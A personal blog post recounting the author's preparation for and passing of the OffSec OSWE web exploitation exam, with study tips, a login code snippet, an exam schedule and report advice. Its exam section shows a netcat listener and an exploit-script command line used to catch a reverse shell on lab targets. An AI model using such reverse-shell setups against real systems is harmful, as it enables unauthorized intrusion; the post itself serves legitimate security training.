Last year (2023) I successfully passed the OSWE exam and obtained the certification. In this post, I will talk about my experience with the exam and also the related course (WEB-300). I will also discuss how I was able to pass it on my first try, as well as additional preparation you could do before taking the course.
What is WEB-300 and OSWE?
The best place to answer those questions is definitely OffSec’s website, that being said, here is the gist of it.
What is WEB-300?
- The course and labs that will prepare you for the OSWE exam.
- It contains the necessary theory (knowledge).
- About every chapter in the course has a set of exercises to complete.
- About every chapter has extra mile exercises.
- Unlike OSCP, you do not get bonus points for the exam by completing exercises and machines.
What is the OSWE Exam?
- A 48-hour exam (The timer does not stop. You are expected to eat, sleep, take breaks, etc.).
- You have a certain number of machines that you need to compromise (a web app and the underlying server).
- This is a white box-style exam. Meaning you have access to the source code of the web applications.
- Multiple vulnerabilities will have to be chained to reach your goals
- You have to automate the exploitation of a given machine in a single program
- You then have another 24 hours to write and submit a professional report. Fail to do so and you will fail the exam (even if you hacked all the exam machines). It is very important, again, to read the exam guide.
I will go deeper into both the course and the exam in the following sections.
Why OSWE?
As I mentioned in my OSCP post, you should always ask yourself the following questions before working on any certification:
- Why do you want to do it?
- What will it bring you?
This is highly personal, but here is a short (incomplete) list of why one should do the WEB-300 course and the OSWE exam:
- Learn, apply, chain, and automate advanced web application exploits
- Certify you as an expert regarding web application pentest
- Pass the HR gating when looking for a job
- Obtain the OSCE3 certification, since you need to achieve OSWE, OSED, and OSEP to get it
- And more …
As you may already know, this course and certification are meant for pentesters or red teamers. If this is not what you want to do, there is probably a better certification for your career goal (see https://pauljerimy.com/security-certification-roadmap/ for some guidance).
Prerequisites
Since it is an expert-level certification, some prerequisites are expected. Here are what I consider must-have before jumping into the course:
- Know how to generate reverse shells for both Linux and Windows, using different techniques (ELF-based, PHP-based, PowerShell-based, bash-based, etc.)
- The course will not teach you how to make reverse shells, so you will have to bring this to the table.
- Be able to easily read code, even a programming language that you do not know at all or just a little
- You will have to be able to quickly find vulnerabilities in a web application using both the source code and the behavior of the app. Be ready to read a lot of code.
- Have already exploited all the vulnerabilities presented in the course (even if only a simple version). See the public syllabus of the course.
- I think having done that will help you concentrate on the advanced concepts and how to find the vulnerabilities. Otherwise, you would have to also learn how prototype pollution works, for example.
- Relatively fluent in Python scripting
- You will have to automate the exploitation of the machines. Even though you could use any programming language of your choice, I recommend using Python like in the course. This is what most security practitioners use anyway, and it is a pretty solid choice.
Here are things that I consider nice to have before jumping into the course:
- Have gone through a 200-level course and exam from OffSec
- Having completed a 24-hours exam of OffSec, you would have a better understanding of what is to come for a 48-hours exam.
- Have exploited advanced versions of some of the vulnerabilities presented in the course (e.g.: manual blind SQL injection)
- This would help streamline the course and focus on finding the vulnerabilities, how to chain them, and automate the exploitation.
The last “prerequisite” I want to mention is tackling this certification with a networking background vs. a programming background. It should not come as a surprise that having a programming background is a huge advantage. Having that background myself, I was already efficient in how I read and understand the code base of an unknown application. I just had to adapt my technique a little. I would argue that any decent programmer could successfully take on this certification. This also means that someone with a “pure” networking background would likely have to work harder. I can tell you that taking this course without any previous experience is going to be tough. I am not saying that to discourage you, I want you to be prepared (more on that later).
One question that is often asked is “Should I do OSCP before OSWE?” or “Should I do OSWA before OSWE?”. My short answer to this is no, you do not have to. Those are not prerequisites to pass OSWE. Would that help? Probably, especially regarding the exam experience, but that’s it.
The Course
Each chapter is a case study of a vulnerable application, most of them are real-world applications that had exploits found in previous versions. Each case study presents new concepts and/or pushes a previously covered concept further. It goes without saying that everything you learn in the course could be part of your exam.
In each chapter, you have exercises and extra miles exercises, which you have to complete against a vulnerable target. If you want to maximize your chances of success in the exam, you have to complete both. The exercises are mandatory to follow along the explanation and you can easily get help from the community on Discord. The extra miles are exercises that push things further where no help is provided by the course. These exercises are the most important and you should take the time to complete them by yourself. You will obtain better value out of them. Note that on my side, I completed all the course material and related exercises first, then went through it again to complete the extra mile exercices. It worked great for me, maybe ask yourself if this would be a good strategy for you.
Like for any course that you take, taking good notes is very important. One thing that I did that was really useful for the exam is, that not only did I take detailed notes, but I also created cheatsheets as I progressed. Specifically, I created a Xmind. In this Xmind, I created a sheet for each programming language and DBMS that were covered in the course. I then created a mindmap of all the vulnerabilities that are specific for a given programming language, and how to find/exploit them. If more details were needed, I referenced my detailed notes. I also created one Xmind sheet for vulnerabilities that are more “common” across the covered languages (e.g.: XXE).
The last important thing, I think it is crucial, is that you should create code templates. As you go through the course, you will create different scripts to automate exploits. Transforming these scripts or methods into templates that can be easily reused during the exam will save you a lot of time. As an example, during my exam, I was able to copy-paste a lot of code from my templates and adapt them a bit, which saved me a lot of time. Here is an overview of my templates structure:
As you can see, I have separated my templates by vulnerabilities/”themes”. It is then further separated by programming languages or DBMS, if applicable. Each template has a self-describing name and an explanation at the top on how to use it. I make sure that I create clean code that is easy to read and understand. But in an exam context, you want to quickly figure out how a particular template can be used and in what context. Note that my templates are not necessarily valid code since they could contain placeholders. This is a simple example to get a basic SQL injection automation started:
I also created a simple Python cheat sheet for small code snippets that can be useful but does not warrant a full code template. I separated everything into different categories like text manipulation or file manipulation. This cheat sheet has been extremely useful during the exam as well. For example (in markdown):
### Authentication
Basic:
```python
import requests
from requests.auth import HTTPBasicAuth
basic = HTTPBasicAuth(user, password)
r = requests.post("<URL>", auth=basic)
```
Username and password in form:
```python
def login(target, username, password):
url = "http://%s/login" % target
data = { "username" : username, "password" : password }
s = requests.Session()
r = s.post(url, data=data)
if "<Login Failed Error Message>" in r.text:
print("[ERROR] Login Failed")
sys.exit(1)
else:
print("[INFO] Login Successful")
```
At the end of the course, you are presented with the lab. Unlike OSCP, there are only a few machines for you to practice on. That said, some machines have more than one way to exploit them. You should consider those few machines more as exam preparation rather than “only” a lab. Indeed, the approach to attack those machines is the same as you will have to do in the exam: start without any access to the target, get authenticated access to the web application, elevate your privileges to the administrator of the web application, obtain a reverse shell on the server. Because of that, you should avoid using Discord to help you with those machines. On my side, I only used the Discord community to confirm that I had found all the possible exploits on a given target. On top of exploiting the targets, this is important to automate the whole exploitation chain as you would do for the exam. Finally, note that you should tackle those machines only after completing the course, the exercises, and the extra miles. This is the best way to prepare for the exam.
The Exam
The exam overall experience is relatively similar to the OSCP exam; in the exam panel, you will have a list of machines to compromise and the respective objectives to complete. Generally speaking, you will need to (still, confirm this by reading the objectives):
- Gain admin privileges on the target website from an unauthenticated user (you may need to gain low-privilege access and perform privilege escalation)
- Gain a reverse shell on the underlying server (no need to perform privilege escalation after that)
- Automate the entire exploitation
Since this is a white box testing certification, you will also have access to a debug machine, which has a version of the target web app that you have to exploit. You will also find the source code of the target application, which you will be able to run a debugger against. Note that any secrets that may or may not be useful in exploiting the target web application are not the same between the demo version and the target version. Having access to the source code can be deceiving for some because it does not make the exam easier. You need to be able to quickly identify potential vulnerabilities and confirm that they can be used to achieve your goal. In other words, be careful of potential rabbit holes. On top of that, you will most likely need to chain multiple vulnerabilities in order to achieve a given objective on a target. One last thing about the source code, you must know that you may need to exploit something in another language that you learned in the course (unless it is language-specific of course). For example, let’s say they showed how to find blind SQL injections only in C#, you may have to find and exploit one in a NodeJS app.
Once you have found the chain of exploits needed to reach your goal, make sure to take lots of screenshots. In the report, you will need to be able to re-enact your thought process and demonstrate the chain of vulnerabilities in the code. You will also need to provide the necessary proof of exploitation in the report and the exam panel (see your objectives for more details). An important note: you can’t download the source code of the app present in the provided VM (but you can screenshot the relevant parts).
After you have achieved your exploitation goals and taken all the necessary screenshots, it is time to automate the exploitation chain. You will not get any points if you do not do that. What they mean by automate is simply that all you need to do to obtain a reverse shell on the target, is run a (Python) script. For example:
- Start a netcat listener
nc -lnvp 4444
- Run the exploit
python exploit.py target-ip attacker-ip attacker-port
Your code should be easy to understand for the reviewers since you will need to provide the source code of your automated scripts in the report. If you were only able to achieve parts of the objectives, you need to automate the exploit up to that point (and probably print back the proof in the script output).
This is a 48-hour exam, as such, it is more of a marathon compared to OSCP. You can’t survive if you do not sleep. I would argue that if you could not achieve the necessary objectives to pass the exam in less than 20 hours of active exam, you were not ready. As always, you are expected to eat, sleep, take breaks, etc. Like my OSCP certification, I gave myself a schedule that I pretty much followed. This forced me to take breaks when I should. I highly recommend that you make one before the exam. This is highly personal and one’s schedule may not work for another’s, but here is the schedule I used for reference.
- Day 1 – (10 to 12 hours of active exam time):
- 1 pm to 6 pm approx. Could be 5 pm
- Diner
- 7 pm (or 6 pm) to midnight approx. (extend to 2 am max)
- Sleep
- Day 2 – (14 to 16 hours of active exam time):
- 8 am to 12 pm approx. (can start earlier if possible, depending on when you stopped)
- Lunch
- 1 pm to 6 pm approx. Cloud be 5 pm
- Diner
- 7 pm (or 6 pm) to midnight approx. (extend to 2 am max)
- Sleep
- Day 3 – Wrap up (5 hours – 8 hours of active exam time):
- 8 am to 1 pm
- Take breaks every 2-3 hours (except maybe the first pm).
- Do not spend more than 2 hours on a given access level without making progress. Take a break, switch targets, etc. Change your mindset.
- Take regular snapshots of the Kali VM in case of any issues
I got a passing score in the morning on the second day. I used the last day to go over all of my notes and material to:
- Make sure I fulfill the objectives
- Make sure that my automated scripts are easy to read and work perfectly
- I have all the necessary screenshots
- I have all the necessary commands to describe how to exploit the targets manually
- Etc.
There are multiple little things that you will not want to forget during the exam. This is why I created my own checklists. This is by no means necessary, but I highly recommend it. I had a checklist for:
- Before the Exam Checklist
- Day of the Exam Checklist
- During the Exam Checklist
- Analysis Checklist
- Vulnerability Checklist
- Before Finishing the Exam Checklist
- Report Checklist
With that done, it is time to move on to the report.
The Report
Just like OSCP, if you do not provide a report in the 24 hours following the end of the exam, you will not get the certification. As for most, if not all certifications from OffSec, they provide a report template. I advise that you use it or at least use a similar approach to it. The report has specific requirements that you must ensure you provide (again, the exam guide is your friend here). That being said, here is how I structured my report regarding the machines themselves:
- Local.txt / Proof.txt
- Start with the content of those files
- Authentication Bypass – <VULNERABILITY NAME>
- How I gained unauthorized access to the web application
- Privilege Escalation – <VULNERABILITY NAME>
- How I gained admin access if needed
- Reverse Shell – <VULNERABILITY NAME>
- How I gained a reverse shell
- PoC Code
- The code used to automate the exploitation of the target
- Screenshots
- Screenshots of local.txt and proof.txt
- Steps
- This is where I went deep into: how I found the vulnerabilities (thought process), how the payloads reach the vulnerabilities (with code screenshots), and how to exploit everything manually.
The person who will review your report will copy-paste your PoC code and run it to make sure that it works. You may already know that copy-pasting code from PDFs can be a pain. For example, you will most likely lose the code indentation in the process, which is less than ideal for Python code. To solve that issue, I provided all my code in base64 format in annexes at the end of the report (making sure to reference them). This ensured that the reviewer had an easy way to copy the code of the PoC (with the necessary instructions to do it).
All in all, the report was relatively quick and easy to write for me. All I had to do was transform all my dirty notes into something professional. If you took good notes and screenshots as you went on with the exam, it will probably be straightforward.
Additionnal Preparation
Here are some resources for additional preparation for WEB-300 and OSWE.
Web Exploitation:
Python:
- Any introduction course on PluralSight, if you have access (can have a 10-day trial for free if I am not mistaken)
- W3 Schools
- Python’s site itself
- Many others
Reverse shell:
OSWE-Like machines:
- YouTube Playlist of Relevant Hack the Box machines. I have not used it myself, but it looks like a good place to start.
Last Thoughts
The course WEB-300 and the OSWE exam mix well together because they provide different values both for you and your employer or clients. Completing the WEB-300 course (and its labs) will give you practical knowledge. Passing the OSWE exam will prove that you can work in a stressful environment, that you are efficient, etc.
As mentioned previously, taking on this certification without any prior experience is going to be rough. A common question that gets asked is “How difficult is it compared to OSCP”? Well, it is an expert-level certification, and OSCP is an intermediate one. That alone should give you a hint. For me, it was pretty much smooth sailing from start to finish, but I had a head start regarding web exploitation, coding, and reading code. In the end, it took me less than 6 months to complete the course and pass the exam (with a full-time job and a family).
Since this is a 48-hour exam (72 if you count the report), it can be difficult for someone with a family. If you want my take on how to keep a balance between work, life, family, and studying for a certification, please take a look at my OSCP post here.
In the end, I am really satisfied with this certification as it sharpened my skills to a new level for web application pentests.
Hopefully, this was useful for you. Otherwise, thanks for ready this long post :).